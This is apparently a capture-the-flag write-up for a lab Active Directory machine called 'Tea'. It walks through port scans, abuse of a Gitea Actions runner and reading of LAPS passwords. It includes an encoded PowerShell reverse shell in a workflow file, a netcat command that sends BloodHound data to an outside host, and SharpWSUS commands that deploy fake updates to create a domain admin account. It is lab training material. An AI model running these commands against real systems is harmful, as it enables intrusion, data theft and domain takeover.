Tea, a medium rated AD chain machine, involved having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, escalating to local admin by having the ability to read LAPS and then escalating to domain admin by abusing WSUS service to deploy malicious updates on domain controller.
DC.tea.vl
PORT STATE SERVICE VERSION
80/tcp filtered http
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-22 11:44:27Z)
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Issuer: commonName=DC.tea.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-19T15:32:23
| Not valid after: 2024-06-19T15:32:23
| MD5: 192634541f77066c4d54456555ec94a4
|_SHA-1: 4db67e0cd398334e78518b2f4b063b4d342f1508
|_ssl-date: 2024-02-22T11:45:15+00:00; +45s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: DC.tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-22T11:44:35+00:00
9389/tcp open mc-nmf .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsSRV.tea.vl
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate,
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-22T12:35:01+00:00; +44s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: SRV
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: SRV.tea.vlPORT 3000 (Gitea)
Registering an account on gitea and checking the users, we only have gitea@tea.vl
Abusing gitea runner
This version is running 1.21.2 which doesn't have any exploits, from user settings under Actions we have one active runner
To abuse this runner, we need to first create a repository and enable Actions
Now creating .gitea/workflows/demo.yaml file in the repository that we have created
Using base64 encoded reverse shell
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAxADMANgAiACwAMgAyADIAMgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=name: Gitea Actions Demo
run-name: ${{ gitea.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: powershell -e encode_commandTransferring and executing SharpHound
Sharphound.exe -c all
To transfer the output, we can utilize netcat
cmd.exe /c '.\nc.exe -w 3 10.8.0.136 2222 < 20240222075332_BloodHound.zip'
nc -l -p 2222 > 20240222075332_BloodHound.zipFrom bloodhound, it doesn’t show much what ACLs does thomas have but we do see that it belongs to Server Administration group
From C:\ drive, we can see WSUS, so we might be able to abuse it
Reading LAPS on SRV
We also have _install folder having LAPS (Locally Administrative Password Solution) installer
We can try reading LAPS on SRV as this user belongs to server administrator group, from the documentation we can use Get-LapsADPassword to retrieve clear text password of local administrator on SRV
Get-LapsADPassword -Identity SRV -AsPlainText
We can verify this from netexec
We know WSUS is installed which is a solution for deploying windows updates for systems in a domain where the hosts don’t have to reach out to internet to get the updates instead they can get updates internally
Abusing WSUS To Become Domain Admin
Since SRV is WSUS server from where updates are deployed and we are local admin, we can deploy malicious updates to DC like adding our own user to be part of domain admin, first we’ll have to create a domain user
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" net user arz P@assword123 /add \"" /title:"Up
dating"'Now approving the update
Verifying if the user is created
Now adding this to local administrators group on DC
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators arz /add \"" /title:"Updating"'
Being a local admin on DC, we can just login through winrm
